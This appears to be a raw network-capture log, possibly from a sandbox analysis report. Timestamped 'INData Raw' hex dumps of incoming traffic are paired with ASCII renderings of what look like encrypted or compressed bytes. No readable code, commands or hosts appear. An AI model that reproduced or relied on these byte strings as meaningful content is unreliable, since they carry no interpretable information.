                                                                                                                                                                                2021-11-11 11:26:50 UTC7871INData Raw: 4e de f0 e9 c7 fb 22 6e d0 fd c4 29 1f b9 2a de 17 d9 fa 67 79 64 40 99 69 2e e3 5d 12 db bb ee f2 f2 c0 26 02 aa e7 63 25 29 cb dc c3 cb d8 1e 4f 91 ca 90 13 31 c1 17 32 35 9f 94 d9 25 78 b8 5a 3c f3 57 21 41 ac 2e ca 3b 74 4f ea eb 32 7a ef 5b f1 08 c7 48 a7 7e 82 42 f0 05 57 c7 9b 82 ea 13 60 7a 5b 3e 24 14 13 3a be b7 a7 9e 25 5d 14 3e b9 c5 89 b3 09 7f 5b b5 a5 79 ae bb 4a f3 12 27 0d c5 01 35 c0 cc 7d 08 5a 1f 32 1e df 5d a4 3a 20 f9 a2 d7 62 84 c6 55 32 0d f5 ec 7f d6 1d ec ff e2 1f 5e df 52 5f 6e 0b a5 f5 89 35 40 65 02 8a f7 01 a9 eb 57 1b 7c cc aa b3 d6 09 f8 2d 01 6e 82 97 ec 8c 4f 1b f7 a2 5c 23 8a 29 91 09 f2 bf 5d f3 39 ae b2 c2 cf 04 22 33 08 7b c1 01 f1 c2 a4 26 27 21 b5 69 be a4 af ac 8a a5 ae 61 b6 c7 04 39 10 c4 09 0e af 99 69 04 81 8b
                                                                                                                                                                                Data Ascii: N"n)*gyd@i.]&c%)O125%xZ<W!A.;tO2z[H~BW`z[>$:%]>[yJ'5}Z2]: bU2^R_n5@eW|-nO\#)]9"3{&'!ia9i
                                                                                                                                                                                2021-11-11 11:26:50 UTC7887INData Raw: 3c 36 85 31 cf ba 64 12 f1 88 6f 98 47 09 16 d7 29 de fe 9d 1c 2f 31 ec f3 28 2a 32 d4 cb 71 cf 48 a8 89 e7 24 16 a9 95 42 d2 7e 9d 50 29 da a9 21 33 3a 84 05 fa b7 93 00 35 ed c3 8b 56 01 f3 7f 29 97 d4 eb c8 f3 e2 eb 01 9c db ac 5b 5b f7 f7 49 41 1a f9 02 6e 34 99 af 75 0f 9d d1 15 72 8d 58 3b fc a7 c5 31 fb b8 ed d3 ec 96 6e b6 82 f6 01 ce f4 76 c9 0b 37 f9 c2 c9 1b 35 eb 0a bd e3 fd 76 5a f7 ef 74 8e ee e8 52 b4 13 9f b2 b5 c9 ea 77 b1 6d cb 44 13 aa d2 d1 1c 79 21 65 c2 ee 8b 3a 32 d1 c1 c3 7f e5 ff 25 f3 a1 2c 5b 02 1a 29 c9 31 5d 73 82 16 33 a8 c7 4f e8 c6 a1 89 c8 20 7c 05 a8 45 c1 2f 8a 49 c6 f2 e9 e7 2e 65 a7 e3 fe 4b 17 76 ee 38 dd e2 a0 35 09 19 9d d7 ba e8 71 d4 af d0 10 4b 2f 8a 97 7c 02 22 b3 1a af 49 31 d0 58 5e 02 61 6a 89 f0 6f b9 4b 84
                                                                                                                                                                                Data Ascii: <61doG)/1(*2qH$B~P)!3:5V)[[IAn4urX;1nv75vZtRwmDy!e:2%,[)1]s3O |E/I.eKv85qK/|"I1X^ajoK
                                                                                                                                                                                2021-11-11 11:26:50 UTC7903INData Raw: 90 98 4a 29 62 38 88 a1 f7 28 14 84 78 ae 98 f3 c0 9e 98 62 35 1c f4 22 6e 52 a1 9a 29 10 84 ca 28 ca f0 17 09 c6 e8 cf a2 ee d7 51 01 44 de 98 84 ba bd 96 26 26 03 18 a5 ac 2f 2e 74 25 47 b7 08 c1 af b5 85 f1 03 6a fc 7b b1 f7 40 7f 39 e0 6a ac ef b5 be b2 e9 c9 01 05 6b cf 29 e7 7a 64 3e e8 eb d6 b0 b5 31 75 1f 27 13 74 7d 65 e4 0e 21 d6 4b d2 61 b0 c2 44 ea ae f9 16 d0 84 5a 8b 45 58 50 4e 33 18 89 b3 09 bc ac 62 d2 ec 4b 20 ed 5a 1f 8b ba 02 c3 27 cf 52 56 d7 6c 26 f5 65 22 3e 73 ed be ac 24 ad fe 5a e3 4a 8f 1e 29 e6 7f 79 83 4b d5 19 89 ce 7e 77 d1 84 f6 ef f2 66 93 ed a9 d2 bf e3 5b 16 c3 91 8a d5 50 3d be 72 9a 16 b6 2e ba bb cb b7 4b c8 72 c0 27 89 e9 75 1c 58 5a 2d ef 34 58 52 23 bc f0 16 d4 d3 a1 68 22 a1 87 09 f0 21 31 25 40 2e 34 58 a2 6a 14
                                                                                                                                                                                Data Ascii: J)b8(xb5"nR)(QD&&/.t%Gj{@9jk)zd>1u't}e!KaDZEXPN3bK Z'RVl&e">s$ZJ)yK~wf[P=r.Kr'uXZ-4XR#h"!1%@.4Xj
                                                                                                                                                                                2021-11-11 11:26:50 UTC7919INData Raw: 47 94 3c b2 31 d3 fe c8 8b 19 97 6c 20 29 f8 ba b4 96 f7 80 31 09 d8 35 58 28 a6 b5 f3 0b 41 90 c8 de 8b 25 3e bb 57 ee f4 b5 24 93 24 2c 8b 27 12 b9 75 b9 36 09 2b f8 1c c5 25 28 f7 9d 58 6b 1b 01 c9 60 5b 78 2c ab c3 f9 5d 3b 6a 83 aa e7 d2 c6 96 ad be 65 a5 7e 1e d1 07 2c 5b 92 ac 11 a4 34 ef 82 1d 39 fc 6e 16 e9 c9 e4 2b a0 e8 db b6 d0 62 31 c6 f6 73 c2 fa 2b 5e 7a 3f 25 ce 42 cb 57 bb 81 4a 6c b2 bb 97 ab 62 70 fe 5f f4 5f c9 78 ce 95 56 d7 eb 7f 05 0f c1 ea 8e 15 29 e6 f9 96 39 8c 0f 09 65 db 64 bb fe 8b 52 2d be 5e 8b 5a 7d 6e 58 fc 09 13 be 59 37 ff 54 32 74 a2 2d a4 46 f2 ae 99 49 2b b3 f9 27 ee 5d 45 3e 28 72 95 e6 2c f0 fa 6b 66 ca 31 fc 89 61 2d 60 7b d7 ec f6 b7 96 9e b0 b8 2d 31 de 5d b1 7b 13 e5 e7 3f cb b9 4a ae c4 f5 f6 7f 5f 43 0f 09 c6
                                                                                                                                                                                Data Ascii: G<1l )15X(A%>W$$,'u6+%(Xk`[x,];je~,[49n+b1s+^z?%BWJlbp__xV)9edR-^Z}nXY7T2t-FI+']E>(r,kf1a-`{-1]{?J_C
                                                                                                                                                                                2021-11-11 11:26:50 UTC7935INData Raw: 38 0c 70 85 25 58 a3 84 ea 97 5d 9e d8 59 cf b3 84 8b 36 fe 62 44 ca d7 d1 57 4d aa db 17 66 21 f2 66 c1 52 d6 b4 b7 55 95 ba 89 33 6c f4 95 77 09 7f 55 51 d8 6a e3 2f d0 7a 9c 9f e6 2b 48 4a cf eb 29 b8 2f f7 d8 17 f2 24 f2 f0 c4 e2 01 5d 13 f2 cc 88 29 69 0b 5e ff e5 8b 96 eb c2 b8 e7 7d 9c ac b5 10 ba 31 d7 9f 7b 85 07 23 30 7b c9 fd a2 c3 ee 04 54 b5 52 d8 f5 4f 97 e6 b0 02 f1 12 ea ff 71 7f 51 dc 64 31 ba a3 9b 3c 21 5f f2 f6 84 c2 20 ca 09 4b 13 c0 ba de 19 5a e4 c0 32 9d 93 94 6c 34 14 44 2d 09 8b 55 01 e8 30 82 33 32 4f fe 13 d0 e9 6f b7 8b 7d 65 56 13 f7 88 90 b0 4e c3 d8 6b cb 9d 75 32 a2 57 6a 4d e5 ab 89 c2 13 e5 59 0d 08 02 da 6c 0f 27 eb dc 74 71 b8 3a 29 25 21 3e 79 58 85 c1 b3 bc b5 a1 01 f6 3a 04 f3 d3 be ba a8 56 a3 05 d5 09 16 c7 88 08
                                                                                                                                                                                Data Ascii: 8p%X]Y6bDWMf!fRU3lwUQj/z+HJ)/$])i^}1{#0{TROqQd1<!_ KZ2l4D-U032Oo}eVNku2WjMYl'tq:)%!>yX:V
                                                                                                                                                                                2021-11-11 11:26:50 UTC7951INData Raw: fa 37 f1 e2 2f fe 28 a3 ca b3 f9 a9 90 ad 59 f5 03 31 30 21 d1 a3 c1 41 27 b8 38 9d a5 f3 2c 16 f7 40 a7 5e 17 31 c2 ae 8d a5 97 58 df 13 04 f1 24 54 3b af 8b f0 5f 09 fd e2 df 71 8b 49 06 f6 39 1e bd 94 1a c9 b1 f1 64 cc 5a d2 a9 ca 85 de 05 ba a2 53 9f 52 d2 e6 3b 4e b5 2d 2f ed 28 d3 ee 2d 51 3e e8 79 d7 b9 b5 8b d9 5c 42 27 e5 15 12 ba aa dc 2a 01 2e 3e 09 58 12 f0 e3 4a 12 31 fa 8a 31 02 26 be bc 49 41 77 ce 2e 50 0d 6e 31 4b d8 b4 c4 55 25 0f 86 75 94 04 a0 cc e1 ea 0e 82 03 09 d0 5f bd 12 ca 1c f8 1e b0 ee b8 0a b6 d1 71 3e 47 ee 43 f7 09 a4 fa 9d c3 2a 8c 26 ee 5e 24 cd ab fa dd 6c b2 9d f8 25 5a 40 9d 21 2b 63 b1 f7 e4 b8 ea a4 52 94 2c c9 01 5b f9 a6 35 4e ef 89 75 2e e6 21 2a 2e 78 b4 cb 24 93 25 d9 ac 6f 97 fe 2d 85 f0 2e 23 12 75 80 59 57 93
                                                                                                                                                                                Data Ascii: 7/(Y10!A'8,@^1X$T;_qI9dZSR;N-/(-Q>y\B'*.>XJ11&IAw.Pn1KU%u_q>GC*&^$l%Z@!+cR,[5Nu.!*.x$%o-.#uYW
                                                                                                                                                                                2021-11-11 11:26:50 UTC7966INData Raw: ba f9 38 d3 a1 b1 5d 7a f0 30 eb bd 32 4f dd 66 07 55 f6 50 61 d8 3e 28 47 f7 4a 1c ca 28 13 20 0b 76 9c 66 90 22 bf 16 6c 22 c3 b3 12 89 d7 be 74 23 9d d9 2a a3 e0 93 98 a3 e2 aa 61 75 1a e3 f7 0b 74 d5 4e 77 a0 e8 29 f1 b4 ed e4 02 06 03 3a bc 0b 0c ca 17 45 55 cc 5f 82 c7 57 73 af be 97 f1 21 aa cd 1a 3f ad 4e 9a 99 50 ff 02 09 c6 01 fb bf 0a 45 a7 93 13 b2 22 27 ee 5d 1e ec 9d 42 2a 96 84 22 c1 10 a2 ef 74 05 64 19 af d9 24 34 5c 21 4b f7 29 e9 6e c5 54 b3 d8 c5 31 d8 49 b2 fe 5d d1 96 af 12 00 61 f9 1f 62 e7 96 a6 67 2e f6 ae c5 2b a8 3c 4e 95 ce ba 3c 17 33 5b 1a 71 cf 31 ce cb e7 a4 e9 ae 3d 26 f8 26 58 ee 3f 5a 7c e9 80 d6 ac 24 2d f0 f5 3a d4 4a f7 7d 4c 9a d3 2e eb 63 7f ce f5 b8 30 a5 ea dd 53 2b d2 e7 1f 56 04 50 09 ff 16 21 d1 8b f6 9f 4e a8
                                                                                                                                                                                Data Ascii: 8]z02OfUPa>(GJ( vf"l"t#*autNw):EU_Ws!?NPE"']B*"td$4\!K)nT1I]abg.+<N<3[q1=&&X?Z|$-:J}L.c0S+VP!N
                                                                                                                                                                                2021-11-11 11:26:50 UTC7982INData Raw: af 73 94 db 1c 98 c6 13 ce 31 cb 42 fb 01 ee c6 18 27 21 c0 66 b2 28 88 0e a1 bd 65 9e 13 c1 ee a3 6b 9a ac 5e 9f 9f 09 d6 36 a4 f4 10 a9 11 39 6d 00 7f 7f f9 5b c6 f2 1e cb f7 7f ee 82 bd f4 15 c9 d9 1b 97 bf be 38 52 cf bd 56 d7 52 8b b0 65 51 2f 09 ec 4e 97 d3 50 fc 21 b3 e9 da ff 51 50 44 e7 ba ac 63 a5 b8 d1 c5 31 c7 be d8 b7 8b 71 01 9d 76 60 68 bd 1e 09 97 bf be 2d 4c 2f aa 23 98 3e 84 f8 28 b6 80 9d 7c 6a 52 e6 f5 4a 02 ef 8e 1a 18 8b 0b a6 29 d7 9c 24 71 51 a7 86 89 4f 74 c5 5a 51 75 a7 de a4 63 db 29 91 09 f0 2b 8d 90 31 c5 6a a3 af 58 16 4b a3 c0 64 8c 5e af b8 e0 4f ae 28 ab ee 9e 73 c0 2e 2c 2f d7 5e 45 f3 4a 89 32 d5 53 fb 27 5f 4b 1b ad 32 dc af 13 2f 02 10 71 f3 40 22 cf 08 6d 39 4c bb 89 0d a7 37 de ca e2 09 19 db 07 a4 df 27 5e 0b 12 3f
                                                                                                                                                                                Data Ascii: s1B'!f(ek^69m[8RVReQ/NP!QPDc1qv`h-L/#>(|jRJ)$qQOtZQuc)+1jXKd^O(s.,/^EJ2S'_K2/q@"m9L7'^?
                                                                                                                                                                                2021-11-11 11:26:50 UTC7998INData Raw: a5 ef 12 b3 8a 4d 17 09 d6 ab cd ac 2e 8c 2f c1 44 02 01 5a d2 ae 34 5a fb 16 e3 29 5d 59 43 71 08 35 50 2f 28 6c 35 9f 46 18 2a 01 f0 23 2d 2d 28 45 0f 0a 33 39 35 44 ea ff e3 46 5e 21 4e 21 fa 4c 22 89 97 94 58 50 f2 4c 03 52 39 7d 5f 8a 68 40 93 e2 97 65 ab bf 0b 39 05 80 e6 68 5e e2 61 0b ea 04 69 59 d3 fb 77 8b 21 d9 21 d8 21 6f 66 0e 09 29 c1 2d 79 ad 96 3a 65 34 eb a6 a1 25 e8 7c fa 25 f1 bf 4f 89 f6 7f 51 a6 42 f3 1c 5f 38 63 ba 0a b5 14 31 9f e2 fc c5 77 88 09 d1 a5 7f 46 b3 ee fb d8 18 b8 05 43 52 aa 42 7f 5f ef af 30 04 e8 29 da 9d 41 3a e1 3f e2 50 cb 8b 53 39 95 f2 4f 5f b8 a1 c9 07 fd b1 3e d2 2e e6 52 2c cb 23 62 c1 bf 57 5e dd 50 09 f6 9c a9 62 b2 b5 70 da 4a f1 34 24 c1 f1 21 fe 26 4f 24 ef f4 73 82 13 57 d6 e2 c9 a9 c7 59 e9 44 eb ff 65
                                                                                                                                                                                Data Ascii: M./DZ4Z)]YCq5P/(l5F*#--(E395DF^!N!L"XPLR9}_h@e9h^aiYw!!!of)-y:e4%|%OQB_8c1wFCRB_0)A:?PS9O_>.R,#bW^PbpJ4$!&O$sWYDe
                                                                                                                                                                                2021-11-11 11:26:50 UTC8014INData Raw: 04 ae 36 49 06 6e 64 2f 8b 11 57 95 8f a5 38 80 31 47 16 70 85 07 ef 09 9a f6 a8 dc ff 12 c1 fc 83 e4 64 b1 ed b8 16 09 f3 ff d9 69 48 f6 01 9d 75 31 75 e3 6f a8 be a1 0f b7 ca fc 0a eb 57 ee 3c bc 94 97 e3 cb 72 4b 17 1d a2 f3 84 03 0f dc 00 ef 9d 40 9f cb 04 95 c5 4f 27 ec a9 53 eb 24 7e 4a 24 b2 5a 97 a6 5d 65 60 f2 32 77 e6 f5 9e cc f9 63 0d 13 31 0f bf ca 05 4e ee 9c 57 01 9d 57 9a 72 fc cb 01 2e 13 2c b4 78 28 35 d0 f1 5e 84 04 ba 39 80 2e ea 30 bf d7 8a 03 27 3c b9 d5 18 4d f2 09 5d c2 7d c0 e9 06 90 31 48 bf 54 8e 53 5a 11 b7 34 48 26 4f 77 3d 59 7f ce be 16 66 01 0a f2 3e 81 e8 a5 df 17 28 19 a2 06 87 0e 01 2b 7f 65 cc a4 dd 25 54 e1 c5 e9 64 e3 aa e2 6a 8f f3 72 e6 59 62 3a 21 c7 f7 42 87 2b a1 d9 55 45 05 be 39 8c 6a 20 8f 01 cb 29 4a c3 be 82
                                                                                                                                                                                Data Ascii: 6Ind/W81GpdiHu1uoW<rK@O'S$~J$Z]e`2wc1NWWr.,x(5^9.0'<M]}1HTSZ4H&Ow=Yf>(+e%TdjrYb:!B+UE9j )J
                                                                                                                                                                                2021-11-11 11:26:50 UTC8030INData Raw: cf 21 8b 1b 2b bf 29 9c 65 d0 7e 74 3c fc e5 c2 0f b7 13 fd 6d a3 25 79 e5 a4 dd 02 09 d1 29 d0 ad 32 3c f5 f6 78 14 d6 ae 49 39 20 94 f2 98 5b d6 e6 fb 67 e0 b6 c9 5a d3 44 eb 2d d8 21 a6 7b f8 b5 c9 13 55 b1 1e f6 54 06 8c ae 21 4b d6 ee 70 5f e0 19 22 7d 36 58 fb 71 5e 35 6e ab 56 7a 8d 83 3e fc 29 89 10 2b 3d 65 00 32 37 f3 f6 85 52 df 32 a9 dc e0 42 01 f7 7d 7c 73 fa 55 51 00 44 ef ff 6d 5a 3a af 5a a6 3a 82 0e 09 d8 94 33 4e 03 65 b9 e8 51 a4 ee a3 77 90 14 8f 21 52 ae 8a f2 04 cc 20 b8 6b ee 8e 8f 23 fc 81 c3 a1 c1 9a 47 3f ac c8 e4 ee e3 f4 25 20 65 0f 3d 4c b6 b4 52 9f 17 20 e7 96 56 bd 2d 0d d7 96 2e b3 e0 27 50 02 91 b1 42 01 c6 d7 14 1b 99 a6 91 48 2d 0d df 94 d3 9c 23 24 75 c2 ef 1c 54 f2 51 31 da 4c 4a 15 8b 36 25 15 02 ee d6 71 44 02 ff 4c
                                                                                                                                                                                Data Ascii: !+)e~t<m%y)2<xI9 [gZD-!{UT!Kp_"}6Xq^5nVz>)+=e27R2B}|sUQDmZ:Z:3NeQw!R k#G?% e=LR V-.'PBH-#$uTQ1LJ6%qDL
                                                                                                                                                                                2021-11-11 11:26:50 UTC8046INData Raw: f3 16 2b e9 cf 2c 4b 72 7f cc b2 96 31 1a c0 90 f5 45 de af 98 bb 01 3e 95 61 76 fb 3a f8 f8 d2 c8 92 d7 b0 f5 b3 c7 22 b8 bf bb 36 f1 df ba 7b a2 55 c5 e7 24 fc 0d a2 ea 12 61 be 8b 2e 72 57 ce 55 98 64 01 da 25 05 0d 45 a7 89 c9 20 6e 27 b5 0d 7f b0 2b a5 41 65 33 77 cc 16 05 7d f2 1f d3 8c 7d f7 b7 c6 80 27 03 18 4e 19 27 33 1f 4c e1 9f e6 11 95 2b ac 75 1e 85 98 bf 2f 09 1e 55 9a 83 1a c1 5e 76 69 78 58 1e ff 09 f7 e5 55 65 98 af 91 c5 29 db f0 2e 4a ac 2e 3a 54 03 e5 c1 e6 c9 4a e8 35 c4 c2 1c b2 6a 4a e8 2d 4f aa 22 c0 19 57 9c 41 81 8a ee 78 1a 4a a8 96 e0 c3 43 8a c4 0a f2 45 ae c5 28 b3 75 05 39 07 8b 1b 1c e1 ef de 0a 90 1a 25 f6 f7 4e 73 97 cc 9d 12 ef 21 f1 ee e6 e3 58 4e e2 be 5f c5 0a 25 c1 3b d1 6b f1 25 2f 74 c2 e3 e4 4b b6 b8 22 83 bd 41
                                                                                                                                                                                Data Ascii: +,Kr1E>av:"6{U$a.rWUd%E n'+Ae3w}}'N'3L+u/U^vixXUe).J.:TJ5jJ-O"WAxJCE(u9%Ns!XN_%;k%/tK"A
                                                                                                                                                                                2021-11-11 11:26:50 UTC8062INData Raw: 48 6b 74 64 65 f2 16 1b bf 4a 7e d9 26 41 01 d1 2d 73 b9 7d bf fc 29 2f de 6d 69 77 d1 2d 2e a1 e4 3e 49 05 64 f9 d3 3e ef cd ad 7a f9 57 a5 cc a9 89 b7 2f ee 69 ce 7d d9 8a c3 03 01 c2 e7 5f 7c 34 7a e4 13 84 45 27 33 01 7d b1 b5 bf c2 f9 09 4b 09 97 44 8b 1b 09 d2 31 3d 9a c7 7b 90 13 e2 ff 8a 10 4a ac 08 14 c7 01 52 c8 13 49 51 ec 13 31 be d2 86 25 5f 7e 32 42 09 fa e9 39 f6 d1 d2 45 a6 aa f2 1c de e5 7c 88 5a dc cd c9 04 a4 06 ca 34 5f e8 0d c2 c1 29 c2 fd 36 a5 9f 49 cb cb 26 05 27 2d 7d c5 98 27 b0 ad 37 89 f1 48 49 eb 16 09 d9 b8 ba cb cf 13 c3 89 e2 2b 85 03 33 bf 8a ed 21 c9 2d 91 47 b8 2e f3 46 c8 c2 68 06 40 28 fb fd 2e 5a 0c dd 3f f9 f2 2a e2 61 d2 d5 1c 96 1f 2a 2f 05 91 14 7c 95 89 68 76 b0 ce 96 a9 d0 48 1b 1d 4f 9e 45 05 f2 63 ab f7 0c 09
                                                                                                                                                                                Data Ascii: HktdeJ~&A-s})/miw-.>Id>zW/i}_|4zE'3}KD1={JRIQ1%_~2B9E|Z4_)6I&'-}'7HI+3!-G.Fh@(.Z?*a*/|hvHOEc
                                                                                                                                                                                2021-11-11 11:26:50 UTC8078INData Raw: 6b 48 0d 58 b4 7a cb 25 c6 91 f1 0f 49 5a 05 4a c3 ea 65 df ba 8d c9 2e 25 b9 b8 bc 8c 66 b8 54 17 a6 89 c2 27 81 b1 21 3e 9c cd f7 72 6c 85 c9 04 a7 80 25 b8 f1 e5 62 29 f8 5b 87 a4 fb 62 01 d0 7f 30 bd da 8a 4a 1e bf 9c b8 b8 97 7f 1c 8d 97 6c 3b 4f e7 f6 81 2f f7 91 58 c8 6e 8d 91 7c 8e 17 ea 28 65 c9 ac 10 c5 29 f0 c5 d1 bc 5e 93 aa b0 b6 1e b7 ba 74 76 be 64 25 ef 64 2a ec b7 8b 59 d7 99 61 fe 48 7e 09 5a f1 98 85 c9 b5 79 14 a7 5e 09 13 e6 ef 2c be 31 5f f1 eb 62 fd 24 4e cc 95 6c b0 c2 0d 01 d6 be 59 9c 69 5f 98 a1 c1 28 ab 5a 5c 26 53 ca e1 3b 28 e8 bf 65 1e 2f 78 e9 d2 59 bf 74 a6 fb 82 cb c6 ff 65 5f ad 1a db 70 9b b7 39 7d c1 3a b8 cb a7 e1 d6 31 d9 6e bd 6d c0 c7 c4 7f bb 51 32 89 f0 44 35 75 e7 48 13 f1 ff cb cd 27 24 14 89 bf c6 d9 13 fe 21
                                                                                                                                                                                Data Ascii: kHXz%IZJe.%fT'!>rl%b)[b0Jl;O/Xn|(e)^tvd%d*YaH~Zy^,1_b$NlYi_(Z\&S;(e/xYte_p9}:1nmQ2D5uH'$!
                                                                                                                                                                                2021-11-11 11:26:50 UTC8094INData Raw: ec d9 85 33 11 d9 e9 6e a0 61 d1 97 fe 8e 61 e8 09 f1 3d 4e 8b cf 5f ce e6 92 cd 96 4f e2 01 10 4c 5d b7 45 d9 09 21 db 5f c6 fa 5a d6 e8 b5 17 eb 1c 28 36 8b 5a 3e b9 5d 89 ea d7 04 b7 c2 24 ad 0e 93 56 27 28 4f b8 a6 d9 9d 5f 91 31 32 7e a6 5d 4e 09 26 e1 fd 94 02 b5 46 e7 16 30 ff e7 eb dc 12 24 b7 34 c0 9d 5f 38 7f 33 16 95 56 57 c4 2b ae fd 78 8b 01 fd 4e fa 05 08 d4 51 49 7f be 98 fe 66 25 31 10 f1 8d 6b c6 b2 5b 38 fc 1e a4 be 31 6c 2b 38 0a 15 21 3e 43 80 20 af 04 75 60 bf d6 93 71 79 6f dc bf 88 10 23 2e 59 b1 29 3a 42 24 82 ab 4c d9 cc 88 47 7c 28 7e 2a 05 0c 6a c2 42 35 08 bc c0 54 09 30 4b 9c e2 27 a2 02 ee b6 95 7e c9 5a 31 1b 05 62 66 82 5e 89 32 51 2f 3c 17 b0 35 a9 4a c6 28 03 d2 9d 4e fe bd d3 22 46 12 dd 9d 5f b4 4b 86 d1 4e 01 ba cb 25
                                                                                                                                                                                Data Ascii: 3naa=N_OL]E!_Z(6Z>]$V'(O_12~]N&F0$4_83VW+xNQIf%1k[81l+8!>C u`qyo#.Y):B$LG|(~*jB5T0K'~Z1bf^2Q/<5J(N"F_KN%
                                                                                                                                                                                2021-11-11 11:26:50 UTC8110INData Raw: 86 f2 91 5b 81 3e ce 1f 58 1b 66 a2 92 e1 3f c7 2f ac 63 ca e2 69 2d 78 87 5e e7 a2 11 c4 89 c3 ab 8d f5 6a fc 54 5a 31 a6 89 da 2d 7d 93 ee 65 cf b6 71 27 ca 56 d2 52 76 53 69 d8 14 14 f2 08 0d 77 5e fd f5 92 c8 7d 2d 4e 80 70 1b 26 65 21 bd 5a 53 b5 59 79 63 8b 36 81 0e 9c 25 c6 7e 75 41 ea 13 2e a2 fd 93 ed 2d d6 fe d9 1e ca e5 5f 90 f7 df bc ca 74 39 bf b8 f6 ce 57 1c 2f 5c 71 cb 04 8c cf 67 65 c3 29 5c 7b 86 cc 77 95 dc 98 e9 d4 e0 c2 c1 0a 54 50 ed c2 3a fa 50 79 cf d3 af c2 59 2e 51 8b 27 d7 19 05 d3 7e bd e6 da 1c 7f 6e 26 9d 91 1f 58 2b 85 38 2d 05 73 40 27 e7 75 96 68 4b e1 ee 8a 49 69 84 f5 65 6e 93 e7 f8 43 d7 bf 2d 46 04 e6 cb b9 43 6b 5e a1 a8 3e 29 e5 3f e1 9d 0b 49 5b e9 36 90 43 d3 ee 37 74 8b f7 6c d3 e1 2a fc 6a d6 aa d9 ef 65 4c 79 01
                                                                                                                                                                                Data Ascii: [>Xf?/ci-x^jTZ1-}eq'VRvSiw^}-Np&e!ZSYyc6%~uA.-_t9W/\qge)\{wTP:PyY.Q'~n&X+8-s@'uhKIienC-FCk^>)?I[6C7tl*jeLy
                                                                                                                                                                                2021-11-11 11:26:50 UTC8126INData Raw: 9d 75 d7 2e f7 92 b8 cb 44 2f 40 94 12 b7 4c ad f8 f7 b6 f5 65 35 12 57 57 83 34 39 81 89 21 fe 2e b8 a6 c9 df d5 29 c4 12 ba 5d d6 bb 59 5a 6c 48 58 35 b5 ee d8 11 1f b1 e3 63 09 fe 09 ef d8 25 04 54 04 52 7b 37 a7 dd 45 30 2d 19 20 f9 29 eb 89 c6 5d 6c 8c 5e 01 ca 8f 5a b9 a5 8b ee 66 87 5a e3 bf 29 35 7e 13 3a 2d 15 64 e5 eb 4f 1f ca 2a 4f b2 08 93 62 13 0f ec 56 91 c1 ad 71 0d a7 51 10 e2 31 fb f7 ec 76 0b c0 2b 37 bf 53 36 14 d0 96 47 61 16 09 c1 75 0f 13 fd fa 28 e5 31 4e 37 31 33 09 db 2e 89 45 62 53 d7 f1 8d 6e 71 f1 f3 20 08 f2 0d 8b 32 29 f1 a2 7f 82 f3 fb d5 14 02 59 f3 8f 8a 08 54 3e 4d fd 8f 17 29 d1 ff c4 a3 57 fb a0 5f c4 f8 fd 21 de d3 20 8b df 5e b8 59 4f a9 e2 02 0c f5 ed a5 ec 20 a1 2e ea 6e f5 e0 bd 35 9d 57 93 a5 b6 05 17 be 91 f0 e8
                                                                                                                                                                                Data Ascii: u.D/@Le5WW49!.)]YZlHX5c%TR{7E0- )]l^ZfZ)5~:-dO*ObVqQ1v+7S6Gau(1N713.EbSnq 2)YT>M)W_! ^YO .n5W
                                                                                                                                                                                2021-11-11 11:26:50 UTC8142INData Raw: 32 a8 3b 04 1d 53 b8 c2 5e cb ae 22 04 27 09 d1 f2 d4 03 6e cf a3 34 89 c8 27 6b e1 73 ac a5 94 1e 2d 29 1e c5 3c 82 ed 61 dd 18 df 38 ae 30 23 16 8b 5a 4d f6 5b 5f 88 bc 09 1a fe 31 d7 b2 f6 5e 52 5d d0 41 93 58 0b 21 f7 f4 56 65 ee fa b2 58 96 c2 7a f6 7b 64 09 c3 04 f9 0f 45 f7 b2 3d 92 05 12 0b 25 b3 e5 28 2d 14 f9 6b e8 80 a5 42 1a de 2b 0b f5 ee 48 25 01 fa 56 f8 c7 c6 ca 46 c0 2b 0e 09 c8 bd 31 b0 f3 3b e4 8c 31 4a cf d8 c8 ff 95 e6 3a 4b c0 27 46 e1 0e 05 80 7f 28 81 be a9 12 ce 2e 28 1d ea a0 15 21 d7 bf cc 9b 1c 26 a8 10 d8 59 38 21 fa 95 5c 3b c9 77 19 f5 ef 0d 44 c0 e9 5b c0 21 ed 9f 4c 78 9f f9 79 49 7f 45 d5 02 3b 0d db 6f 7e 75 07 71 a3 01 49 4b 50 82 07 5f 5e d2 2e 6d 52 77 b1 02 0a 66 6b 48 ed a4 fe 88 54 f8 64 9c 24 1e 80 8b ba 56 50 5e
                                                                                                                                                                                Data Ascii: 2;S^"'n4'ks-)<a80#ZM[_1^R]AX!VeXz{dE=%(-kB+H%VF+1;1J:K'F(.(!&Y8!\;wD[!LxyIE;o~uqIKP_^.mRwfkHTd$VP^
                                                                                                                                                                                2021-11-11 11:26:50 UTC8158INData Raw: ca 1e 4f af 28 80 31 bf f4 9f 3a 5a 8b 78 5c f1 42 5a 97 ff 8b 1c 4f a9 5d 9f 12 24 b8 45 b2 ea 59 f7 8b 31 f9 f3 4c a0 28 29 09 db 7b 2f 00 5d 2a 08 8d 7b 4e 3d d9 58 7a 17 af e7 aa 2d 09 7e 80 2d db 0a 09 c2 48 1c 89 12 d9 01 f1 ef 74 d3 f2 9d 2d 02 b2 1e 7d 0b ae d9 44 cd 78 72 05 92 61 13 89 ce 6e e6 42 4b 85 ee ea b2 13 97 ef 8c 90 17 26 05 91 2a ee 93 a3 07 0f f3 62 2d a9 21 55 68 25 5e 4a 3b 01 e8 09 29 18 9c fd 66 93 98 ee 1c 0a 12 36 e9 7b bb 4e 62 3e cf 5d 53 18 a7 6c ef 5a f7 fd d2 9a 3b 7b b4 12 ee be a6 f7 02 bb 64 6e 44 21 75 54 40 e2 e7 20 d9 2a 49 df fb bc 92 02 a8 52 a6 32 95 dd 96 9c b4 02 42 31 19 ec b1 25 09 c7 de 80 c4 6d e3 9b 69 d3 57 33 66 2d d4 09 cc 50 ff 2f d8 34 cf 42 80 76 42 40 5b bb 56 c8 f9 fd 89 f7 77 b3 8a 16 60 bf 01 cb
                                                                                                                                                                                Data Ascii: O(1:Zx\BZO]$EY1L(){/]*{N=Xz-~-Ht-}DxranBK&*b-!Uh%^J;)f6{Nb>]SlZ;{dnD!uT@ *IR2B1%miW3f-P/4BvB@[Vw`
